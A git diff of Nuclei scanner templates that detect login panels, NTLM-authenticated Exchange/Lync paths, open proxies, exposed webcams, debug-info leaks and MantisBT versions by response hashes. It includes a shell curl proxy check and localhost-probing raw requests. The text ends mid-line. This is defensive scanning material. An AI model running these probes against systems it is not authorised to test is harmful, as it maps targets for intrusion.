"{{BaseURL}}/mcx/" - - "{{BaseURL}}/mcx/mcxservice.svc" - - "{{BaseURL}}/meet/" - - "{{BaseURL}}/meeting/" - - "{{BaseURL}}/microsoft-server-activesync/" - - "{{BaseURL}}/oab/" - - "{{BaseURL}}/ocsp/" - - "{{BaseURL}}/owa/" - - "{{BaseURL}}/persistentchat/" - - "{{BaseURL}}/phoneconferencing/" - - "{{BaseURL}}/powershell/" - - "{{BaseURL}}/public/" - - "{{BaseURL}}/reach/sip.svc" - - "{{BaseURL}}/requesthandler/" - - "{{BaseURL}}/requesthandlerext/" - - "{{BaseURL}}/rgs/" - - "{{BaseURL}}/rgsclients/" - - "{{BaseURL}}/rpc/" - - "{{BaseURL}}/rpcwithcert/" - - "{{BaseURL}}/scheduler/" - - "{{BaseURL}}/ucwa/" - - "{{BaseURL}}/unifiedmessaging/" - - "{{BaseURL}}/webticket/" - - "{{BaseURL}}/webticket/webticketservice.svc" - - "{{BaseURL}}/webticket/webticketservice.svcabs/" - + - raw: + - | + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= + threads: 10 + payloads: + path: + - / + - /abs/ + - /ecp/ + - /etc/ + - /ews/ + - /mcx/ + - /oab/ + - /owa/ + - /rgs/ + - /rpc/ + - /conf/ + - /meet/ + - /ocsp/ + - /ucwa/ + - /adfs/ + - /dialin/ + - /public/ + - /certsrv/ + - /exchweb/ + - /meeting/ + - /certprov/ + - /exchange/ + - /scheduler/ + - /webticket/ + - /autoupdate/ + - /certenroll/ + - /powershell/ + - /rgsclients/ + - /rpcwithcert/ + - /autodiscover/ + - /hybridconfig/ + - /reach/sip.svc + - /aspnet_client/ + - /groupexpansion/ + - /persistentchat/ + - /requesthandler/ + - /unifiedmessaging/ + - /mcx/mcxservice.svc + - /phoneconferencing/ + - /requesthandlerext/ + - /deviceupdatefiles_ext/ + - /deviceupdatefiles_int/ + - /microsoft-server-activesync/ + - /webticket/webticketservice.svc + - /webticket/webticketservice.svcabs/ + - /adfs/services/trust/2005/windowstransport matchers-condition: and matchers: - - type: word - words: - - "WWW-Authenticate: NTLM" - - "Www-Authenticate: NTLM" - part: header - condition: or - + - type: dsl + dsl: + - "contains(tolower(all_headers), 'www-authenticate: ntlm')" - type: status status: - 401 + extractors: + - type: kval + kval: + - 'www_authenticate' diff --git a/poc/other/nuuo-file-inclusion-9168.yaml b/poc/other/nuuo-file-inclusion-9168.yaml index a753b1dac4..2a29674630 100644 --- a/poc/other/nuuo-file-inclusion-9168.yaml +++ b/poc/other/nuuo-file-inclusion-9168.yaml @@ -1,10 +1,9 @@ id: nuuo-file-inclusion info: - name: NUUO NVRmini 2 v3.0.8 - Atrbitary File Retrieval + name: NUUO NVRmini 2 3.0.8 Local File Disclosure author: princechaddha severity: high - reference: - - https://www.exploit-db.com/exploits/40211 + reference: https://www.exploit-db.com/exploits/40211 tags: nuuo,lfi requests: - method: GET diff --git a/poc/other/old-copyright.yaml b/poc/other/old-copyright.yaml index a1cdb7e7e1..6c401649d9 100644 --- a/poc/other/old-copyright.yaml +++ b/poc/other/old-copyright.yaml @@ -1,13 +1,16 @@ id: old-copyright + info: name: Find pages with old copyright dates author: geeknik severity: info tags: misc + requests: - method: GET path: - "{{BaseURL}}" + redirects: true max-redirects: 3 matchers-condition: and @@ -17,6 +20,7 @@ requests: - '2021' part: body negative: true + - type: regex part: body regex: diff --git a/poc/other/open-mjpg-streamer.yaml b/poc/other/open-mjpg-streamer.yaml index a00ea8360c..07826b437c 100644 --- a/poc/other/open-mjpg-streamer.yaml +++ b/poc/other/open-mjpg-streamer.yaml @@ -1,16 +1,18 @@ id: open-mjpg-streamer + info: name: open-mjpg-streamer author: gboddin severity: medium - description: Open mjpg-streamer service sharing webcam/camera feed - reference: - - https://github.com/jacksonliam/mjpg-streamer + reference: https://github.com/jacksonliam/mjpg-streamer tags: iot,webcam + description: Open mjpg-streamer service sharing webcam/camera feed + requests: - method: GET path: - "{{BaseURL}}/?action=stream" + max-size: 2048 matchers-condition: and matchers: @@ -18,6 +20,7 @@ requests: words: - 'MJPG-Streamer/0.2' part: header + - type: status status: - 200 diff --git a/poc/other/open-proxy-localhost.yaml b/poc/other/open-proxy-localhost.yaml index 25fad3bb8f..30cf9f22c6 100644 --- a/poc/other/open-proxy-localhost.yaml +++ b/poc/other/open-proxy-localhost.yaml @@ -5,7 +5,7 @@ info: severity: high tags: exposure,config,proxy,misconfig,fuzz description: The host is configured as a proxy which allows access to web ports on the host's internal interface. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. reference: - https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/ - https://en.wikipedia.org/wiki/Open_proxy @@ -16,30 +16,24 @@ info: cwe-id: CWE-441 requests: - raw: - - |+ + - | GET / HTTP/1.1 Host: {{Hostname}} - - - |+ + - | GET http://somethingthatdoesnotexist/ HTTP/1.1 Host: somethingthatdoesnotexist - - - |+ + - | GET http://127.0.0.1/ HTTP/1.1 Host: 127.0.0.1 - - - |+ + - | GET https://127.0.0.1/ HTTP/1.1 Host: 127.0.0.1 - - - |+ + - | GET http://localhost/ HTTP/1.1 Host: localhost - - - |+ + - | GET https://localhost/ HTTP/1.1 Host: localhost - unsafe: true req-condition: true stop-at-first-match: true @@ -57,3 +51,4 @@ requests: - (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows")) - (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows")) - (!contains(body_1, "It works") && !contains(body_2, "It works")) && (contains(body_3, "It works") || contains(body_4, "It works") || contains(body_5, "It works") || contains(body_6, "It works")) +# Enhanced by cs on 2022/02/14 diff --git a/poc/other/open-proxy-portscan.yaml b/poc/other/open-proxy-portscan.yaml index 28baa02253..387bf7f087 100644 --- a/poc/other/open-proxy-portscan.yaml +++ b/poc/other/open-proxy-portscan.yaml @@ -3,9 +3,7 @@ info: name: Open Proxy to Ports on the Proxy's localhost Interface author: sullo severity: high - tags: exposure,config,proxy,misconfig,fuzz description: The host is configured as a proxy which allows access to its internal interface - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. reference: - https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/ - https://en.wikipedia.org/wiki/Open_proxy @@ -14,6 +12,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-441 + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. + tags: exposure,config,proxy,misconfig,fuzz requests: - raw: - |+ @@ -59,4 +59,4 @@ requests: - (!regex("(?i)POP3",body_1)) && (!regex("(?i)POP3",body_2)) && (regex("(?i)POP3",body_6)) - (!regex("(?i)SMTP",body_1)) && (!regex("(?i)SMTP",body_2)) && ((regex("(?i)SMTP",body_5)) || (regex("(?i)SMTP",body_7)) || (regex("(?i)SMTP",body_8))) -# Updated by Chris on 2022/01/21 +# Enhanced by cs on 2022/01/21 diff --git a/poc/other/openam-workflow.yaml b/poc/other/openam-workflow.yaml index 421ca20fb0..afa92cc956 100644 --- a/poc/other/openam-workflow.yaml +++ b/poc/other/openam-workflow.yaml @@ -6,6 +6,6 @@ info: description: A simple workflow that runs all OpenAM related nuclei templates on a given target. workflows: - - template: technologies/openam-detect.yaml + - template: exposed-panels/openam-panel.yaml subtemplates: - tags: openam diff --git a/poc/other/otobo-panel-9412.yaml b/poc/other/otobo-panel-9412.yaml index ea051f5552..bc2b7fcd8e 100644 --- a/poc/other/otobo-panel-9412.yaml +++ b/poc/other/otobo-panel-9412.yaml @@ -1,24 +1,34 @@ id: otobo-panel + info: - name: OTOBO Login Panel + name: OTOBO Login Panel - Detect author: princechaddha severity: info - description: OTOBO is one of the most flexible web-based ticketing systems used for Customer Service, Help Desk, IT Service Management. + description: OTOBO login panel was detected. reference: - https://github.com/rotheross/otobo + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"otobo" tags: panel,otobo + requests: - method: GET path: - "{{BaseURL}}/otobo/index.pl" + matchers-condition: and matchers: - type: regex part: body regex: - "(.*)OTOBO(.*)" + - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/poc/other/panabit-panel-9445.yaml b/poc/other/panabit-panel-9445.yaml index ca065c8f6b..261430cced 100644 --- a/poc/other/panabit-panel-9445.yaml +++ b/poc/other/panabit-panel-9445.yaml @@ -1,4 +1,5 @@ id: panabit-panel + info: name: Panabit Panel Detect author: ffffffff0x @@ -7,10 +8,12 @@ info: metadata: fofa-query: app="Panabit-智能网关" tags: panabit,panel + requests: - method: GET path: - "{{BaseURL}}/login/login.htm" + redirects: true max-redirects: 2 matchers-condition: and @@ -19,6 +22,7 @@ requests: part: body words: - 'Panabit' + - type: status status: - 200 diff --git a/poc/other/plesk-obsidian-9597.yaml b/poc/other/plesk-obsidian-9597.yaml index 09b8d6f0eb..9fdeccf21f 100644 --- a/poc/other/plesk-obsidian-9597.yaml +++ b/poc/other/plesk-obsidian-9597.yaml @@ -1,29 +1,24 @@ id: plesk-obsidian - info: name: Plesk Obsidian author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6951 tags: panel,plesk - requests: - method: GET path: - '{{BaseURL}}/login_up.php' - matchers-condition: and matchers: - type: word words: - 'Plesk Obsidian' - - type: status status: - 200 - extractors: - type: regex group: 1 regex: - - '(?i)([A-Za-z 0-9.]+)' \ No newline at end of file + - '(?i)([A-Za-z 0-9.]+)' diff --git a/poc/other/plesk-onyx.yaml b/poc/other/plesk-onyx.yaml index fdd918af75..ce27005046 100644 --- a/poc/other/plesk-onyx.yaml +++ b/poc/other/plesk-onyx.yaml @@ -4,7 +4,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6501 - tags: panel,plesk,login + tags: panel requests: - method: GET path: diff --git a/poc/other/postmessage-tracker-9640.yaml b/poc/other/postmessage-tracker-9640.yaml index a091ac8494..a2e802d4b6 100644 --- a/poc/other/postmessage-tracker-9640.yaml +++ b/poc/other/postmessage-tracker-9640.yaml @@ -1,12 +1,11 @@ id: postmessage-tracker - info: name: Postmessage Tracker author: pdteam severity: info - reference: https://github.com/vinothsparrow/iframe-broker/blob/main/static/script.js + reference: + - https://github.com/vinothsparrow/iframe-broker/blob/main/static/script.js tags: headless,postmessage - headless: - steps: - action: setheader @@ -18,33 +17,32 @@ headless: args: hook: true code: | - (function() {window.alerts = []; + () => { + window.alerts = []; - function logger(found) { - window.alerts.push(found); - } + logger = found => window.alerts.push(found); - function getStackTrace () { - var stack; - try { - throw new Error(''); - } - catch (error) { - stack = error.stack || ''; + function getStackTrace() { + var stack; + try { + throw new Error(''); + } catch (error) { + stack = error.stack || ''; + } + + stack = stack.split('\n').map(line => line.trim()); + return stack.splice(stack[0] == 'Error' ? 2 : 1); } - stack = stack.split('\n').map(function (line) { return line.trim(); }); - return stack.splice(stack[0] == 'Error' ? 2 : 1); - } - var oldListener = Window.prototype.addEventListener; + var oldListener = Window.prototype.addEventListener; - Window.prototype.addEventListener = function(type, listener, useCapture) { - if(type === 'message') { - logger(getStackTrace()); - } - return oldListener.apply(this, arguments); - }; - })(); + Window.prototype.addEventListener = (type, listener, useCapture) => { + if (type === 'message') { + logger(getStackTrace()); + } + return oldListener.apply(this, arguments); + }; + } - args: url: "{{BaseURL}}" action: navigate @@ -52,7 +50,7 @@ headless: - action: script name: alerts args: - code: "window.alerts" + code: window.alerts matchers: - type: word part: alerts diff --git a/poc/other/powerlogic-ion.yaml b/poc/other/powerlogic-ion.yaml index 4f414942fe..a2dc55dd44 100644 --- a/poc/other/powerlogic-ion.yaml +++ b/poc/other/powerlogic-ion.yaml @@ -3,7 +3,8 @@ info: name: PowerLogic ION Exposed author: dhiyaneshDK severity: low - reference: https://www.exploit-db.com/ghdb/6810 + reference: + - https://www.exploit-db.com/ghdb/6810 tags: panel requests: - method: GET diff --git a/poc/other/printers-info-leak.yaml b/poc/other/printers-info-leak.yaml index 2b49588f9a..6391d0a246 100644 --- a/poc/other/printers-info-leak.yaml +++ b/poc/other/printers-info-leak.yaml @@ -1,5 +1,4 @@ id: printers-info-leak - info: name: Unauthorized Printer Access author: pussycat0x @@ -7,9 +6,6 @@ info: reference: - https://book.hacktricks.xyz/pentesting/9100-pjl tags: network,iot,printer - metadata: - mongoid: 0000 - network: - inputs: - data: "@PJL INFO STATUS\n" diff --git a/poc/other/prometheus-flags-endpoint.yaml b/poc/other/prometheus-flags-endpoint.yaml index 5b2256ae03..ad5a884ecf 100644 --- a/poc/other/prometheus-flags-endpoint.yaml +++ b/poc/other/prometheus-flags-endpoint.yaml @@ -1,38 +1,29 @@ id: prometheus-flags - info: name: Prometheus flags API endpoint author: geeknik severity: info description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username. - reference: - - https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ + reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ tags: prometheus,leak - metadata: - max-request: 1 - -http: +requests: - method: GET path: - "{{BaseURL}}/api/v1/status/flags" - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - '"data":' - '"config.file":' condition: and - - type: word part: header words: - 'application/json' - extractors: - type: regex name: web_admin_enabled diff --git a/poc/other/proxy-checker.yaml b/poc/other/proxy-checker.yaml new file mode 100644 index 0000000000..0561c43ed6 --- /dev/null +++ b/poc/other/proxy-checker.yaml @@ -0,0 +1,31 @@ +id: proxy-checker +info: + name: Proxy Checker + author: roninja + severity: info + +variables: + PROXY: "{{BaseURL}}" + +code: + - engine: + - sh + - bash + source: | + curl -vL -x $PROXY https://bacconsultings.org --connect-timeout 10 --max-time 15 + matchers-condition: and + matchers: + - type: word + words: + - "weebly" + condition: and + + - type: word + words: + - "bac-consulting" + condition: and + + - type: word + words: + - "BAC" +# digest: 4a0a0047304502203169f03cd3d120e7badba2a2470dc1842b7f68f10981d7edfe480bbad066c8f50221009bb0968266d066dec7e606d594cfade06012b5b73e7ec81f9b03b0d33a446bfa:e13c478fa5c4541f06589b8ff90dea85 \ No newline at end of file diff --git a/poc/other/psmessage.yaml b/poc/other/psmessage.yaml index 2d66e25559..0b4b57ca9d 100644 --- a/poc/other/psmessage.yaml +++ b/poc/other/psmessage.yaml @@ -1,19 +1,19 @@ id: addeventlistener-detect info: - name: DOM EventListener detection - author: yavolo,dwisiswant0 + name: AddEventlistener detection + author: yavolo severity: info - tags: xss,misc + tags: xss reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source requests: - method: GET path: - - "{{BaseURL}}" + - '{{BaseURL}}' matchers: - - type: regex - part: body - regex: - - (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']? # Test cases: https://www.regextester.com/?fam=121118 + - type: word + words: + - 'window.addEventListener(' + part: body \ No newline at end of file diff --git a/poc/other/pulse-secure-panel-9715.yaml b/poc/other/pulse-secure-panel-9715.yaml index c21b8845cc..55cb67a8e2 100644 --- a/poc/other/pulse-secure-panel-9715.yaml +++ b/poc/other/pulse-secure-panel-9715.yaml @@ -3,17 +3,21 @@ info: name: Pulse Secure VPN Panel author: bsysop severity: info + tags: panel,pulse,vpn requests: - method: GET path: - "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi" + - "{{BaseURL}}/dana-na/auth/url_2/welcome.cgi" + - "{{BaseURL}}/dana-na/auth/url_3/welcome.cgi" + stop-at-first-match: true matchers-condition: or matchers: - type: word - words: - - "/dana-na/auth/welcome.cgi" part: header - - type: word words: - - "/dana-na/css/ds.css" + - "/dana-na/auth/welcome.cgi" + - type: regex part: body + regex: + - "(?i)/dana-na/css/ds(_[a-f0-9]{64})?.css" diff --git a/poc/other/pypicloud-panel.yaml b/poc/other/pypicloud-panel.yaml index ed93546114..984e2eeabd 100644 --- a/poc/other/pypicloud-panel.yaml +++ b/poc/other/pypicloud-panel.yaml @@ -1,19 +1,17 @@ id: pypicloud-panel - info: name: Pypicloud panel detection author: Supras severity: info - reference: https://pypicloud.readthedocs.io/en/latest/ + reference: + - https://pypicloud.readthedocs.io/en/latest/ metadata: - google-query: 'intext:pypicloud' + google-query: intext:pypicloud tags: panel,pypicloud - requests: - method: GET path: - '{{BaseURL}}/login' - matchers-condition: and matchers: - type: word @@ -22,7 +20,6 @@ requests: - 'Pypicloud' - '' condition: or - - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/other/rack-mini-profiler-9788.yaml b/poc/other/rack-mini-profiler-9788.yaml index 78ca392d9d..ff2a5a8a47 100644 --- a/poc/other/rack-mini-profiler-9788.yaml +++ b/poc/other/rack-mini-profiler-9788.yaml @@ -1,22 +1,21 @@ id: rack-mini-profiler - info: - name: rack-mini-profiler environment information disclosure + name: rack-mini-profiler - Environment Information Disclosure author: vzamanillo severity: high + description: rack-mini-profiler is prone to environmental information disclosure which could help an attacker formulate additional attacks. tags: config,debug,rails - requests: - method: GET path: - "{{BaseURL}}/?pp=env" - matchers-condition: and matchers: - type: word words: - "Rack Environment" - - type: status status: - 200 + +# Enhanced by mp on 2022/07/21 diff --git a/poc/other/rack-mini-profiler.yaml b/poc/other/rack-mini-profiler.yaml index 78ca392d9d..c4fe9d6826 100644 --- a/poc/other/rack-mini-profiler.yaml +++ b/poc/other/rack-mini-profiler.yaml @@ -1,10 +1,9 @@ id: rack-mini-profiler info: - name: rack-mini-profiler environment information disclosure + name: rack-mini-profiler environmnet information discloure author: vzamanillo severity: high - tags: config,debug,rails requests: - method: GET @@ -16,7 +15,6 @@ requests: - type: word words: - "Rack Environment" - - type: status status: - 200 diff --git a/poc/other/request-based-interaction.yaml b/poc/other/request-based-interaction.yaml index 04667ffb6d..c237d72fc4 100644 --- a/poc/other/request-based-interaction.yaml +++ b/poc/other/request-based-interaction.yaml @@ -4,8 +4,7 @@ info: author: pdteam severity: info description: The remote server fetched a spoofed DNS Name from the request. - reference: - - https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface + reference: https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface tags: oast,ssrf,generic requests: - raw: diff --git a/poc/other/robots-9887.yaml b/poc/other/robots-9887.yaml index 3093fb1602..00667893d7 100644 --- a/poc/other/robots-9887.yaml +++ b/poc/other/robots-9887.yaml @@ -3,7 +3,7 @@ info: name: robots.txt file author: CasperGN severity: info - tags: misc,generic + requests: - method: GET path: @@ -14,10 +14,12 @@ requests: - type: word words: - "Disallow:" + - type: word words: - text/plain part: header + - type: dsl dsl: - "len(body)>=140 && status_code==200" diff --git a/poc/other/scs-landfill-control-10098.yaml b/poc/other/scs-landfill-control-10098.yaml index 52f192bb32..4500e3e023 100644 --- a/poc/other/scs-landfill-control-10098.yaml +++ b/poc/other/scs-landfill-control-10098.yaml @@ -1,16 +1,18 @@ id: scs-landfill-control + info: name: SCS Landfill Remote Monitoring Control + description: SCS RMC is the IoT for landfills, manufacturing, and industrial facilities that provides real-time viewing, analysis, and control of equipment and systems critical to production and safe operations remotely. + reference: https://www.scsengineers.com/services/remote-monitoring-control/ author: geeknik severity: info - description: SCS RMC is the IoT for landfills, manufacturing, and industrial facilities that provides real-time viewing, analysis, and control of equipment and systems critical to production and safe operations remotely. - reference: - - https://www.scsengineers.com/services/remote-monitoring-control/ tags: panel,scs,rmc,iot + requests: - method: GET path: - "{{BaseURL}}" + redirects: true matchers-condition: and matchers: diff --git a/poc/other/securenvoy-panel-10114.yaml b/poc/other/securenvoy-panel-10114.yaml index 138ed7d13c..a8d75ddb16 100644 --- a/poc/other/securenvoy-panel-10114.yaml +++ b/poc/other/securenvoy-panel-10114.yaml @@ -1,23 +1,19 @@ id: securenvoy-panel - info: name: SecurEnvoy Admin Login author: 0xrod severity: info tags: panel,securenvoy - requests: - method: GET path: - "{{BaseURL}}/secadmin/" - matchers-condition: and matchers: - type: word words: - '' part: body - - type: status status: - 200 diff --git a/poc/other/security-txt.yaml b/poc/other/security-txt.yaml index 50f38f1ac1..2ac4a1a846 100644 --- a/poc/other/security-txt.yaml +++ b/poc/other/security-txt.yaml @@ -4,12 +4,14 @@ info: author: bad5ect0r severity: info description: The website defines a security policy. - tags: misc + tags: misc,generic requests: - method: GET path: - "{{BaseURL}}/.well-known/security.txt" - "{{BaseURL}}/security.txt" + redirects: true + max-redirects: 3 matchers-condition: and matchers: - type: status diff --git a/poc/other/shell-history.yaml b/poc/other/shell-history.yaml index f6762a888b..1e715e7760 100644 --- a/poc/other/shell-history.yaml +++ b/poc/other/shell-history.yaml @@ -42,5 +42,5 @@ requests: - "application/xml" - "html>" - "text/html" - part: all + part: response negative: true diff --git a/poc/other/signatures-10269.yaml b/poc/other/signatures-10269.yaml index 7e85ceb20a..5d36cadb2a 100644 --- a/poc/other/signatures-10269.yaml +++ b/poc/other/signatures-10269.yaml @@ -1,20 +1,23916 @@ -id: mantisbt -info: - name: mantisbt - author: cn-kali-team - tags: detect,tech,mantisbt - severity: info - metadata: - product: mantisbt - vendor: mantisbt - verified: true -http: -- method: GET - path: - - '{{BaseURL}}/' - matchers: - - type: word - words: - - alt="mantis bugtracker - - powered by mantis bugtracker - case-insensitive: true +id: mantisbt + +info: + name: mantisbt_version_fingerprint + severity: info + author: glatisant & erwan + +requests: + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Revision_History.xml" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"5c1554f443900ddd0c249b2bb2dfd316\" == md5(body))" + - type: dsl + name: 2.5.2 + dsl: + - "(\"202ca0131c0770ae1be1e7f675007730\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"99e46f2d7682fc524eeffc49172a4d09\" == md5(body))" + - type: dsl + name: 2.5.0 + dsl: + - "(\"66c1836c80cf212de0551e902effbc8f\" == md5(body))" + - type: dsl + name: 2.4.2 + dsl: + - "(\"6d9ce94f2721367f21b4b6f457a0d1a8\" == md5(body))" + - type: dsl + name: 2.4.1 + dsl: + - "(\"a589fdc1d9321004aab77ca66ea44218\" == md5(body))" + - type: dsl + name: 2.4.0 + dsl: + - "(\"926ea517a8ad26ab5df2255b378cabba\" == md5(body))" + - type: dsl + name: 2.3.3 + dsl: + - "(\"1debf70035fbbbcf2c27feb7a6ca3081\" == md5(body))" + - type: dsl + name: 2.3.2 + dsl: + - "(\"ea6f0b17f787aa865751f6ca26519a03\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.1 + dsl: + - "(\"781bdaaadc0d6818f2457a7b54aa726a\" == md5(body))" + - type: dsl + name: 2.2.3 - 2.2.4 + dsl: + - "(\"6cdc4fe6a708c8e0dd4646e4604a68c2\" == md5(body))" + - type: dsl + name: 2.2.2 + dsl: + - "(\"591c04a8dd7d7bb7520f05f271c599f6\" == md5(body))" + - type: dsl + name: 2.2.1 + dsl: + - "(\"fc8669de934c3a7345500772410c4f71\" == md5(body))" + - type: dsl + name: 2.2.0 + dsl: + - "(\"422c54dbcf38e404d709ed8d966f11a2\" == md5(body))" + - type: dsl + name: 2.1.2 - 2.1.3 + dsl: + - "(\"edb928da7fc6d22e5c1e642169da1acb\" == md5(body))" + - type: dsl + name: 2.1.1 + dsl: + - "(\"7e0ace03076b72e4f8cf8ded8451c3b9\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.0 + dsl: + - "(\"2c6d8a0a1e9e8fad9b2e40e07753052d\" == md5(body))" + - type: dsl + name: 2.0.1 + dsl: + - "(\"d21b8286047c8ec85ff72fa33d1e65e5\" == md5(body))" + - type: dsl + name: 1.3.9 + dsl: + - "(\"27fd50fed8765aeb163c5abd2310dc84\" == md5(body))" + - type: dsl + name: 1.3.8 + dsl: + - "(\"f1892663aa1f96e81c253ddac5d7fc2b\" == md5(body))" + - type: dsl + name: 1.3.7 + dsl: + - "(\"91371b305677cc9404d1a38c7e6a7b62\" == md5(body))" + - type: dsl + name: 1.3.6 + dsl: + - "(\"672b2564a96946d8c45e332cceab7369\" == md5(body))" + - type: dsl + name: 1.3.5 + dsl: + - "(\"be9eb546abb021b9c87b870a351ec16a\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"1191036dc6a10da1a82803019e3ea76d\" == md5(body))" + - type: dsl + name: 1.3.3 + dsl: + - "(\"0b2d995ddd6cd1b65f2f52818452c22b\" == md5(body))" + - type: dsl + name: 1.3.2 + dsl: + - "(\"09d14008aeca907817bb1fe3a188fa77\" == md5(body))" + - type: dsl + name: 1.3.12 + dsl: + - "(\"b557afdad4c473424acbdec444cdde1c\" == md5(body))" + - type: dsl + name: 1.3.11 + dsl: + - "(\"4e33cf4ec01547485c274aca3cd9250c\" == md5(body))" + - type: dsl + name: 1.3.10 + dsl: + - "(\"9f07394bfb43d64718c1d0a396d489b7\" == md5(body))" + - type: dsl + name: 1.3.1 + dsl: + - "(\"3713902596727653d716611c54a56752\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"bb12b57c0f930c669b5b9de2d8db97d9\" == md5(body))" + - type: dsl + name: 2.7.0 + dsl: + - "(\"d75f35c886cda1f78dc7a36d22b172da\" == md5(body))" + - type: dsl + name: 2.8.0 + dsl: + - "(\"ad626b3e54aa22a7e516a397ed421588\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"71a99cdadc9c532ddfcc865b64b4aa92\" == md5(body))" + - type: dsl + name: 2.9.0 + dsl: + - "(\"eb5e226b7c6be2b4af20d81dbac5392c\" == md5(body))" + - type: dsl + name: 2.8.1 + dsl: + - "(\"e302c1a5d0a95863560b4d19a4dfdc52\" == md5(body))" + - type: dsl + name: 1.3.13 + dsl: + - "(\"392b7fd2c11763e0a3af59a7246970fd\" == md5(body))" + - type: dsl + name: 2.10.0 + dsl: + - "(\"8d7f7a57490e287944fb6ae16a6cc2ed\" == md5(body))" + - type: dsl + name: 2.9.1 + dsl: + - "(\"415bbc6e9e59bc1fd7a92050e32ce72b\" == md5(body))" + - type: dsl + name: 2.11.0 + dsl: + - "(\"26aaf5c6a4af7709fe589ae95d31cfd6\" == md5(body))" + - type: dsl + name: 2.10.1 + dsl: + - "(\"9c1f7a10afc9a98c9ab931df7d8817cc\" == md5(body))" + - type: dsl + name: 1.3.14 + dsl: + - "(\"c8e603b5f06055f9e74a4753da6f2435\" == md5(body))" + - type: dsl + name: 2.12.0 + dsl: + - "(\"ddbae28e58dd2aea8720ad7549e874e6\" == md5(body))" + - type: dsl + name: 2.11.1 + dsl: + - "(\"c9f3f38a94ea4221695fa0fa0f1472cb\" == md5(body))" + - type: dsl + name: 2.13.1 + dsl: + - "(\"1a05ac0f16974fcab5895f90c75cc76e\" == md5(body))" + - type: dsl + name: 2.13.0 + dsl: + - "(\"a1fa897e75a0b912bdb48432e1efb3de\" == md5(body))" + - type: dsl + name: 2.12.2 + dsl: + - "(\"2b3759615a29d4136c2e37d5959fd43e\" == md5(body))" + - type: dsl + name: 2.12.1 + dsl: + - "(\"2274751d84fa467e07c663269d1708b8\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"2fec12f466ac1ce8a4d598b9db162fa0\" == md5(body))" + - type: dsl + name: 2.13.2 + dsl: + - "(\"c71dd9141af31ad7b383c7c925e4395c\" == md5(body))" + - type: dsl + name: 1.3.15 + dsl: + - "(\"ef6b4911a69cfe72975aca0fe3345926\" == md5(body))" + - type: dsl + name: 2.15.0 + dsl: + - "(\"6cc1a27201e8f362f375a12ee488c1e2\" == md5(body))" + - type: dsl + name: 2.16.0 + dsl: + - "(\"cde882ba15dd82b93b4023edd0eb1be6\" == md5(body))" + - type: dsl + name: 2.15.1 + dsl: + - "(\"aa8689281de96c8ec7a1a62f364f6303\" == md5(body))" + - type: dsl + name: 2.17.1 + dsl: + - "(\"a928e13ffc1d05d87f711977e01a72da\" == md5(body))" + - type: dsl + name: 2.17.0 + dsl: + - "(\"f815840f85bad0e74e715f2da60edb69\" == md5(body))" + - type: dsl + name: 2.16.1 + dsl: + - "(\"ecfa2c02fa7b4dc598b8db42aaac33b8\" == md5(body))" + - type: dsl + name: 1.3.16 + dsl: + - "(\"2f496fced4feba074b159870d4102580\" == md5(body))" + - type: dsl + name: 2.18.0 + dsl: + - "(\"bb19274dc5da6f703414cadb1c9fa8f3\" == md5(body))" + - type: dsl + name: 2.17.2 + dsl: + - "(\"6adeadf66fc352ba6c4a39438bde7c10\" == md5(body))" + - type: dsl + name: 2.19.0 + dsl: + - "(\"da71bbb03fc5893050d8466db96f43cf\" == md5(body))" + - type: dsl + name: 2.18.1 + dsl: + - "(\"51e0d169e5fc2cc843deff6d0856b3de\" == md5(body))" + - type: dsl + name: 1.3.17 + dsl: + - "(\"c72c07c3afde2f6275785f0e2516781b\" == md5(body))" + - type: dsl + name: 2.20.0 + dsl: + - "(\"4ff69bb0afaf535e0371a2324885e6e2\" == md5(body))" + - type: dsl + name: 2.19.1 + dsl: + - "(\"3c6c550b249e9fa3a0eb42514543c92c\" == md5(body))" + - type: dsl + name: 1.3.18 + dsl: + - "(\"89a267b60651354d72464f0f1381bd84\" == md5(body))" + - type: dsl + name: 2.21.0 + dsl: + - "(\"143bc3f54e5b49a177f243c7df5077f1\" == 